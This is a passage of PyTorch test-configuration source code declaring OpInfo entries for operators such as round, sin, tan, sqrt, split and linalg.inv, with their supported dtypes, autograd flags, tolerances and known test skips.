torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True,), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_0', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': 0}, {'decimals': 0}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 0}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_3', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': 3}, {'decimals': 3}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 3}), skips=( # test_ops already tested for this overload with `decimals_0` opinfo entry DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_neg_3', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': -3}, {'decimals': -3}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': -3}), skips=( # test_ops already tested for this overload with `decimals_0` opinfo entry DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('sin', ref=np.sin, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), # TODO: Add torch.chalf backward dtype support. Currently, we get: # AssertionError: The supported dtypes for sin on device type cuda are incorrect! # The following dtypes did not work in backward but are listed by the OpInfo: {torch.complex32}. backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), decorators=(precisionOverride({torch.bfloat16: 1e-2}),)), UnaryUfuncInfo('sinc', ref=np_sinc_with_fp16_as_fp32, aliases=('special.sinc',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2, torch.float16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/49133 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.cfloat]), )), UnaryUfuncInfo('sinh', ref=np_unary_ufunc_integer_promotion_wrapper(np.sinh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.float16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,)), # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('sign', ref=reference_sign, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/41245 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]), )), UnaryUfuncInfo('sgn', ref=reference_sgn, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.half), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/41245 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]), # Reference: https://github.com/pytorch/pytorch/issues/53958 # Test fails in comparison on Nan as the `equal_nan` is True for # comparing the CPU tensors. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.complex64, torch.complex128]), # Reference: https://github.com/pytorch/pytorch/issues/48486 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.complex64]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Passes for float, but for complex - Need: _s_where DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=complex_types()), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), OpInfo('split', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=partial(sample_inputs_split, list_args=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_autodiffed=True), OpInfo('split', # Cannot declare this aten_name because of # test_variant_consistency_jit_split_list_args_cpu_float32 decomp_aten_name='split_with_sizes', variant_test_name='list_args', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=partial(sample_inputs_split, list_args=True), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('split_with_sizes', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=sample_inputs_split_with_sizes, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True), BinaryUfuncInfo('__radd__', op=torch.Tensor.__radd__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=['aten::add'],), BinaryUfuncInfo('__rdiv__', op=torch.Tensor.__rdiv__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), promotes_int_to_float=True, lhs_make_tensor_kwargs={'exclude_zero': True}, supports_out=False, skips=( # https://github.com/pytorch/pytorch/issues/76806 DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::mul', 'aten::reciprocal'],), BinaryUfuncInfo('__rmul__', op=torch.Tensor.__rmul__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=['aten::mul'],), BinaryUfuncInfo('__rand__', op=torch.Tensor.__rand__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), BinaryUfuncInfo('__ror__', op=torch.Tensor.__ror__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), BinaryUfuncInfo('__rxor__', op=torch.Tensor.__rxor__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('__rmatmul__', op=torch.Tensor.__rmatmul__, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_matmul, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, decorators=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view'), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_noncontiguous_samples'), ), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), BinaryUfuncInfo('__rmod__', op=torch.Tensor.__rmod__, dtypes=floating_types_and(torch.bfloat16, torch.half,), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), # Support autograd after torch.remainder(Tensor, Tensor) supports # autograd of the second argument. # https://github.com/pytorch/pytorch/pull/58476/files#r637167630 # supports_autograd=False, assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::remainder'],), BinaryUfuncInfo('__rpow__', op=torch.Tensor.__rpow__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), # Reference: https://github.com/pytorch/pytorch/issues/54774 # "log2" "_vml_cpu" not implemented for Half backward_dtypes=all_types_and_complex_and(torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), # TODO: FIXME tolerance is too high DecorateInfo(unittest.skip('Skipped!'), 'TestGradients'), ), assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::pow'],), BinaryUfuncInfo('__rsub__', op=torch.Tensor.__rsub__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, supports_two_python_scalars=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::rsub'],), BinaryUfuncInfo('rsub', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, supports_inplace_autograd=False, assert_autodiffed=None, sample_inputs_func=sample_inputs_add_sub), OpInfo('select', aten_backward_name='select_backward', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=sample_inputs_select, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('select_scatter', dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=sample_inputs_select_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('slice_scatter', dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=sample_inputs_slice_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('signbit', ref=np.signbit, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False,), UnaryUfuncInfo('tan', ref=np.tan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.float64], active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), # tan(pi/2 * odd_number) is nan reference_numerics_filter=NumericsFilter( condition=lambda x: close_to_int(x / (math.pi * 0.5)), safe_val=math.pi)), UnaryUfuncInfo('tanh', ref=np.tanh, aten_backward_name='tanh_backward', aliases=('nn.functional.tanh',), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), # alias, nn.functional.tanh, will produce (because of warning string saved): # "RuntimeError: Expected to not find "tanh" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), # tan(j * pi/2 * odd_number) is nan reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 0.5j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), OpInfo('tensor_split', ref=np.array_split, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_tensor_split,), OpInfo('hsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hsplit, error_inputs_func=error_inputs_hsplit,), OpInfo('vsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_vsplit, error_inputs_func=error_inputs_vsplit,), OpInfo('dsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_dsplit, error_inputs_func=error_inputs_dsplit,), OpInfo('triangular_solve', op=torch.triangular_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_legacy_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Gradcheck fails DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=floating_and_complex_types()), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), UnaryUfuncInfo('trunc', aliases=('fix', ), ref=np.trunc, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('exp2', aliases=('special.exp2', ), ref=np_unary_ufunc_integer_promotion_wrapper(np.exp2), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('expm1', aliases=('special.expm1', ), ref=np_unary_ufunc_integer_promotion_wrapper(np.expm1), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/48926#issuecomment-739734774 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('nan_to_num', ref=np.nan_to_num, dtypes=all_types_and(torch.half, torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bool, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), # Passing numpy_kwargs via sample_kwargs, as numpy does comparison # with BFloat16 in float, since it currently doesn't support BFloat16. # Ref: https://github.com/pytorch/pytorch/issues/57982#issuecomment-839150556 sample_kwargs=lambda device, dtype, input: ({}, {'posinf': torch.finfo(torch.bfloat16).max, 'neginf': torch.finfo(torch.bfloat16).min}) if dtype is torch.bfloat16 else ({}, {})), UnaryUfuncInfo('reciprocal', ref=np_unary_ufunc_integer_promotion_wrapper(np.reciprocal), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/45690 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), # Reference: https://github.com/pytorch/pytorch/pull/49102#issuecomment-744604601 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), )), UnaryUfuncInfo('rsqrt', ref=lambda x: np.reciprocal(np.sqrt(x)), domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.half: 5e-2}),), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.cfloat, torch.cdouble)), )), UnaryUfuncInfo('sqrt', ref=np.sqrt, supports_sparse=True, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_sparse_csr=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 7e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/47358 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), # Reference: https://github.com/pytorch/pytorch/pull/47293#issuecomment-721774436 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('square', ref=np.square, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), decorators=(precisionOverride({torch.complex64: 3e-4, torch.bfloat16: 3e-1}),), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/52549 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble]), # >>> t = torch.tensor(complex(-0.01, float("inf"))) # >>> np.square(t.numpy()) # (-inf-infj) # >>> t.square() # tensor(-inf-infj) # >>> t.cuda().square() # tensor(inf+nanj, device='cuda:0') DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble]), # Reference: https://github.com/pytorch/pytorch/pull/52551#issuecomment-782596181 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), ),), OpInfo('lerp', dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_lerp, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True), OpInfo('linalg.inv', aten_name='linalg_inv', op=torch.linalg.inv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), 